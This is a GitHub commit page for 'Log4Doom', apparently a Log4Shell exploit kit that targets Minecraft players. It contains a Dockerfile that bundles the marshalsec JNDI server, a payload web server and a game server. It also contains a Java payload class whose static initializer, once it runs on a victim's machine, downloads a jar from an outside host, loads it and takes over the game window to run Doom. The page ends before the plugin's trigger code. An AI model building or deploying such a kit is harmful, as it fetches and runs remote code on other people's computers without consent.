-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 4e253b3
Showing
20 changed files
with
587 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,24 @@ | ||
| # Payload server | ||
| PayloadServer/node_modules | ||
| PayloadServer/payload | ||
|
|
||
| # Minecraft | ||
| MinecraftServer/logs | ||
| MinecraftServer/help.yml | ||
| PayloadServer/package-lock.json | ||
| MinecraftServer/banned-ips.json | ||
| MinecraftServer/banned-players.json | ||
| MinecraftServer/commands.yml | ||
| MinecraftServer/permissions.yml | ||
| MinecraftServer/ops.json | ||
| MinecraftServer/plugins | ||
| MinecraftServer/usercache.json | ||
| MinecraftServer/whitelist.json | ||
| MinecraftServer/world | ||
| MinecraftServer/spigot.yml | ||
|
|
||
| # Eclipse | ||
| Log4DoomPlugin/.classpath | ||
| Log4DoomPlugin/.project | ||
| Log4DoomPlugin/.settings | ||
| Log4DoomPlugin/target |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| # Node stuff | ||
| PayloadServer/node_modules | ||
| PayloadServer/payload | ||
|
|
||
| # Java classes | ||
| *.class | ||
|
|
||
| # Minecraft server | ||
| MinecraftServer/logs | ||
| MinecraftServer/help.yml | ||
| PayloadServer/package-lock.json | ||
| MinecraftServer/banned-ips.json | ||
| MinecraftServer/banned-players.json | ||
| MinecraftServer/commands.yml | ||
| MinecraftServer/permissions.yml | ||
| MinecraftServer/ops.json | ||
| MinecraftServer/plugins | ||
| MinecraftServer/usercache.json | ||
| MinecraftServer/whitelist.json | ||
| MinecraftServer/world | ||
| MinecraftServer/spigot.yml | ||
|
|
||
| # Eclipse | ||
| Log4DoomPlugin/.classpath | ||
| Log4DoomPlugin/.project | ||
| Log4DoomPlugin/.settings | ||
| Log4DoomPlugin/target |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| { | ||
| "editor.wordBasedSuggestions": false | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| FROM ubuntu:latest | ||
|
|
||
| WORKDIR /log4doom | ||
|
|
||
| ENV PUBLIC_IP="127.0.0.1" | ||
|
|
||
| # === Install packages === | ||
| RUN apt-get update | ||
|
|
||
| # Java and Maven | ||
| RUN apt-get install -y openjdk-8-jdk | ||
| RUN apt-get install -y maven | ||
|
|
||
| # NodeJS | ||
| RUN apt-get -y install curl gnupg | ||
| RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - | ||
| RUN apt-get -y install nodejs | ||
|
|
||
| # === Copy files and setting up directories === | ||
|
|
||
| # Marshalsec | ||
| COPY marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec-0.0.3-SNAPSHOT-all.jar | ||
|
|
||
| # Payload web server | ||
| COPY PayloadServer /log4doom/PayloadServer | ||
| RUN mkdir /log4doom/PayloadServer/payload | ||
| WORKDIR /log4doom/PayloadServer | ||
| RUN npm install | ||
| COPY Log4DoomPayload.java /log4doom/PayloadServer/payload/Log4DoomPayload.java | ||
|
|
||
| # Minecraft server | ||
| COPY MinecraftServer /log4doom/MinecraftServer | ||
| RUN mkdir /log4doom/MinecraftServer/plugins | ||
|
|
||
| # Compiling the exploit | ||
| WORKDIR /log4doom/PayloadServer/payload | ||
| RUN javac Log4DoomPayload.java | ||
| WORKDIR /log4doom | ||
|
|
||
| # Compile plugins | ||
| RUN mkdir /build | ||
| COPY Log4DoomPlugin /build/Log4DoomPlugin | ||
| WORKDIR /build/Log4DoomPlugin | ||
| RUN mvn clean package | ||
|
|
||
| # Install plugins | ||
| RUN cp /build/Log4DoomPlugin/target/Log4Doom-1.0.0-SNAPSHOT.jar /log4doom/MinecraftServer/plugins/Log4Doom.jar | ||
| WORKDIR /log4doom/MinecraftServer/plugins | ||
| COPY ./plugins/*.jar . | ||
| WORKDIR /log4doom | ||
|
|
||
| # Main script | ||
| COPY start.sh . | ||
|
|
||
| # Expose the ports | ||
| EXPOSE 1389 | ||
| EXPOSE 3000 | ||
| EXPOSE 25565 | ||
|
|
||
| CMD ["bash", "./start.sh"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,151 @@ | ||
| import java.awt.Frame; | ||
| import java.io.BufferedInputStream; | ||
| import java.io.File; | ||
| import java.io.FileNotFoundException; | ||
| import java.io.FileOutputStream; | ||
| import java.io.IOException; | ||
| import java.io.InputStream; | ||
| import java.io.OutputStream; | ||
| import java.lang.reflect.Field; | ||
| import java.lang.reflect.InvocationTargetException; | ||
| import java.lang.reflect.Method; | ||
| import java.net.URL; | ||
| import java.net.URLClassLoader; | ||
| import java.nio.file.Files; | ||
| import java.util.ArrayList; | ||
| import java.util.List; | ||
| import java.util.zip.ZipEntry; | ||
| import java.util.zip.ZipFile; | ||
|
|
||
| import javax.swing.JFrame; | ||
|
|
||
| public class Log4DoomPayload { | ||
| public static final String MOCHADOOM_MODIFIED_SOURCE = "https://jenkins.novauniverse.net/job/mochadoom-modified/lastBuild/net.zeeraa.mochadoom$MochadoomModified/artifact/net.zeeraa.mochadoom/MochadoomModified/0.0.1-SNAPSHOT/MochadoomModified-0.0.1-SNAPSHOT.jar"; | ||
| public static final String WAD_SOURCE = "https://ia600609.us.archive.org/16/items/DoomsharewareEpisode/doom.ZIP"; | ||
|
|
||
| public static final String ENGINE_CLASS = "net.zeeraa.mochadoom.Engine"; | ||
| public static final String DOOM_MAIN_CLASS = "net.zeeraa.mochadoom.doom.DoomMain"; | ||
|
|
||
| static { | ||
| System.out.println("Starting Log4Doom payload"); | ||
| try { | ||
| run(); | ||
| } catch (Exception e) { | ||
| e.printStackTrace(); | ||
| System.err.println("Failed to set up log4doom. " + e.getClass().getName() + " " + e.getMessage()); | ||
| } | ||
| } | ||
|
|
||
| private static void run() throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException, NoSuchMethodException, SecurityException, NoSuchFieldException { | ||
| List<JFrame> runningFrames = new ArrayList<>(); | ||
|
|
||
| for (Frame f : JFrame.getFrames()) { | ||
| if (f instanceof JFrame) { | ||
| runningFrames.add((JFrame) f); | ||
| } | ||
| } | ||
|
|
||
| if (runningFrames.size() == 0) { | ||
| System.err.println("No running jframes found"); | ||
| return; | ||
| } | ||
|
|
||
| JFrame frameToUse = null; | ||
|
|
||
| if (runningFrames.size() == 1) { | ||
| System.out.println("Using first frame since there there was only 1 jframe found"); | ||
| frameToUse = runningFrames.get(0); | ||
| } else { | ||
| System.out.println("Using first visible frame or first since there where multiple jframes found"); | ||
| frameToUse = runningFrames.stream().filter(JFrame::isVisible).findFirst().orElse(runningFrames.get(0)); | ||
| } | ||
|
|
||
| System.out.println("Found " + runningFrames.size() + " jframes"); | ||
|
|
||
| File tempFile = Files.createTempDirectory("jog4doom_assets").toFile(); | ||
| System.out.println("Using path " + tempFile.getAbsolutePath() + " for storing data"); | ||
| tempFile.deleteOnExit(); | ||
|
|
||
| System.out.println("Doawnloading DOOM1.WAD"); | ||
| File wadFile = downloadDoom(MOCHADOOM_MODIFIED_SOURCE, tempFile); | ||
| wadFile.deleteOnExit(); | ||
| System.out.println("DOOM1.WAD downloaded to " + wadFile.getAbsolutePath()); | ||
|
|
||
| System.out.println("Downloading modified Mochadoom"); | ||
| File mochadoomJar = new File(tempFile.getAbsolutePath() + File.separator + "MochadoomModified.jar"); | ||
| downloadFile(MOCHADOOM_MODIFIED_SOURCE, mochadoomJar.getAbsolutePath()); | ||
| System.out.println("MochadoomModified downloaded to " + mochadoomJar.getAbsolutePath()); | ||
| mochadoomJar.deleteOnExit(); | ||
|
|
||
| URL jarUrl = mochadoomJar.toURI().toURL(); | ||
| System.out.println("Creating URLClassLoader with url: " + jarUrl.toString()); | ||
| URLClassLoader classLoader = new URLClassLoader(new URL[] { jarUrl }); | ||
|
|
||
| Class<?> doomEngineClass = classLoader.loadClass(ENGINE_CLASS); | ||
| System.out.println("Doom engine class: " + doomEngineClass.getName()); | ||
|
|
||
| String[] doomArgs = new String[] { | ||
| "-iwad", | ||
| wadFile.getAbsolutePath() | ||
| }; | ||
|
|
||
| System.out.println("Starting Mochadoom"); | ||
| Object engine = doomEngineClass.getConstructor(JFrame.class, String[].class).newInstance(frameToUse, doomArgs); | ||
| System.out.println("Engine initialized. " + engine.getClass().getName()); | ||
|
|
||
| System.out.println("Fetching field DOOM in Engine"); | ||
| Field doomField = doomEngineClass.getDeclaredField("DOOM"); | ||
|
|
||
| Class<?> doomMainClass = classLoader.loadClass(DOOM_MAIN_CLASS); | ||
| System.out.println("Getting instance of " + doomMainClass.getName()); | ||
| Object doomMain = doomField.get(engine); | ||
|
|
||
| System.out.println("Fetching method setupLoop() from DoomMain"); | ||
| Method setupLoopMethod = doomMainClass.getDeclaredMethod("setupLoop"); | ||
|
|
||
| System.out.println("Engine initialized. Calling setupLoop on " + doomMainClass.getName()); | ||
| setupLoopMethod.invoke(doomMain); | ||
|
|
||
| classLoader.close(); | ||
| } | ||
|
|
||
| public static final File downloadDoom(String zipFileUrl, File outputDirectory) throws IOException { | ||
| File tmpFile = new File(outputDirectory.getAbsolutePath() + File.separator + "tmp.zip"); | ||
| tmpFile.deleteOnExit(); | ||
| downloadFile(WAD_SOURCE, tmpFile.getAbsolutePath()); | ||
| ZipFile zipFile = new ZipFile(tmpFile); | ||
| ZipEntry entry = zipFile.getEntry("DOOM1.WAD"); | ||
|
|
||
| File outputFile = new File(outputDirectory.getAbsolutePath() + File.separator + "DOOM1.WAD"); | ||
|
|
||
| InputStream inputStream = zipFile.getInputStream(entry); | ||
| OutputStream outputStream = new FileOutputStream(outputFile); | ||
| byte[] buffer = new byte[1024]; | ||
| int bytesRead; | ||
| while ((bytesRead = inputStream.read(buffer)) != -1) { | ||
| outputStream.write(buffer, 0, bytesRead); | ||
| } | ||
|
|
||
| outputStream.close(); | ||
| zipFile.close(); | ||
| tmpFile.delete(); | ||
|
|
||
| return outputFile; | ||
| } | ||
|
|
||
| public static final void downloadFile(String fileUrl, String savePath) throws FileNotFoundException, IOException { | ||
| URL url = new URL(fileUrl); | ||
|
|
||
| BufferedInputStream in = new BufferedInputStream(url.openStream()); | ||
| FileOutputStream fileOutputStream = new FileOutputStream(savePath); | ||
|
|
||
| byte[] dataBuffer = new byte[1024]; | ||
| int bytesRead; | ||
| while ((bytesRead = in.read(dataBuffer, 0, 1024)) != -1) { | ||
| fileOutputStream.write(dataBuffer, 0, bytesRead); | ||
| } | ||
|
|
||
| in.close(); | ||
| fileOutputStream.close(); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,5 @@ | ||
| name: Log4Doom | ||
| main: net.zeeraa.log4doom.Log4Doom | ||
| description: Turning players games into doom using questionable methods | ||
| version: 1.0 | ||
| authors: [Zeeraa] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,52 @@ | ||
| <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
| <modelVersion>4.0.0</modelVersion> | ||
| <groupId>net.zeeraa</groupId> | ||
| <artifactId>Log4Doom</artifactId> | ||
| <version>1.0.0-SNAPSHOT</version> | ||
| <build> | ||
| <sourceDirectory>src</sourceDirectory> | ||
| <resources> | ||
| <resource> | ||
| <targetPath>.</targetPath> | ||
| <filtering>true</filtering> | ||
| <directory>.</directory> | ||
| <includes> | ||
| <include>plugin.yml</include> | ||
| </includes> | ||
| </resource> | ||
| </resources> | ||
| <plugins> | ||
| <plugin> | ||
| <groupId>org.apache.maven.plugins</groupId> | ||
| <artifactId>maven-resources-plugin</artifactId> | ||
| <version>3.2.0</version> | ||
| <configuration> | ||
| <encoding>UTF-8</encoding> | ||
| </configuration> | ||
| </plugin> | ||
| <plugin> | ||
| <artifactId>maven-compiler-plugin</artifactId> | ||
| <version>3.8.0</version> | ||
| <configuration> | ||
| <source>1.8</source> | ||
| <target>1.8</target> | ||
| <encoding>UTF-8</encoding> | ||
| </configuration> | ||
| </plugin> | ||
| </plugins> | ||
| </build> | ||
| <repositories> | ||
| <repository> | ||
| <id>spigot-repo</id> | ||
| <url>https://hub.spigotmc.org/nexus/content/repositories/snapshots/</url> | ||
| </repository> | ||
| </repositories> | ||
| <dependencies> | ||
| <dependency> | ||
| <groupId>org.spigotmc</groupId> | ||
| <artifactId>spigot-api</artifactId> | ||
| <version>1.8.8-R0.1-SNAPSHOT</version> | ||
| <scope>provided</scope> | ||
| </dependency> | ||
| </dependencies> | ||
| </project> |
Oops, something went wrong.